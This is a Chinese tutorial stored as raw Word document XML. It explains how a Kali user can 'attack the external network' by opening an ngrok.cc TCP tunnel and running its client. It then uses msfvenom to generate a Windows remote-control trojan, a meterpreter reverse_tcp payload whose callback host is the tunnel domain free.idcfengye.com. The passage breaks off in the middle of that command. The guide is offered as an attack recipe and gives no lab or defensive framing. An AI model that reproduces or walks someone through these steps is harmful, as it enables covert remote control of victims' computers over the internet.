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469C" w14:textId="44C05D9A" w:rsidR="005E1FD0" w:rsidRPr="002C26F0" w:rsidRDefault="002C26F0">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>想要攻击外网，需要进行内网穿透。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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、首先打开：</w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
            <w:color w:val="336699"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>https://www.ngrok.cc</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，进去注册个账号，登录进去，然后点击左侧的实名认证项，进行实名认证。实名认证是需要支付一定费用的，以前是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>元，现在不知道，自己根据财力量力而行。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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42F52C9B" wp14:editId="3A32AA69">
            <wp:extent cx="5274310" cy="3139440"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="6851598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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、实名认证通过后，点击左侧的隧道管理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> -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》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开通隧道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> -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》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找到美国</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ngrok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>免费服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> -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》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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>点击立即购买</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>》</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在弹出来的窗体中点击确定按钮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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52BD1F82" wp14:editId="4ED57271">
            <wp:extent cx="5274310" cy="3797300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="666440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444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、隧道协议：选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spell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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>隧道名称：自定义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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>远程端口：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>10000-11000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>之间的端口随便写，如果不能用在文本框后面会有提示，就换一个，直到能用为止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     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>本地端口：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>地址，端口是后面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>需要监听的端口，如果到时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>6666</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>端口不能用，就自己换一个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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C6E98F7" wp14:editId="37B3696F">
            <wp:extent cx="5274310" cy="3144520"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="166205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4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、信息确定无误之后，点击确定开通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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79EF144B" wp14:editId="1B73F1E0">
            <wp:extent cx="4239895" cy="3064510"/>
            <wp:effectExtent l="0" t="0" r="8255" b="2540"/>
            <wp:docPr id="6237419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5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、点击客户端下载，记住这里的隧道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，后面要用。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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63EA75E8" wp14:editId="3EBB52BB">
            <wp:extent cx="5274310" cy="783590"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="17180328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6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、根据自己的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>版本来下载，如果跟我的一样，就下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Linux 64Bit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>版本，如果不知道的，下错了用不了，就重新下载一个试试就知道了。点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Linux 64Bit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>版本就会自动下载了。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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34BA3E71" wp14:editId="748DACF4">
            <wp:extent cx="5274310" cy="2847975"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="18043478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7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、如果是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>下载的，就把下载的这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">linux_amd64.zip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上传到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>去，如果是直接用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>下载的就不用管了。然后直接把这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> zip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>压缩包解压出来，进入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>linux_amd64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>目录下，里面有个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sunny</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文件，输入命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sunny  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>clientid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="676A6C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>173043376275</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="676A6C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="676A6C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>173043376275</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="676A6C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是隧道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="676A6C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="676A6C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，上面第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="676A6C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="676A6C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>步有。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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67FA43E0" wp14:editId="1491E245">
            <wp:extent cx="5274310" cy="4872355"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="125780959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;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="333333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回车之后看到这个界面，就表示成功了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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="070AC584" wp14:editId="581C92E1">
            <wp:extent cx="5274310" cy="1256030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="13454737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&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="&amp;quot;" w:hAnsi="&amp;quot;" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、然后新打开一个命令窗口，使用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msfvenom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生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>远控木马。输入命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>lhost=free.idcfengye.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
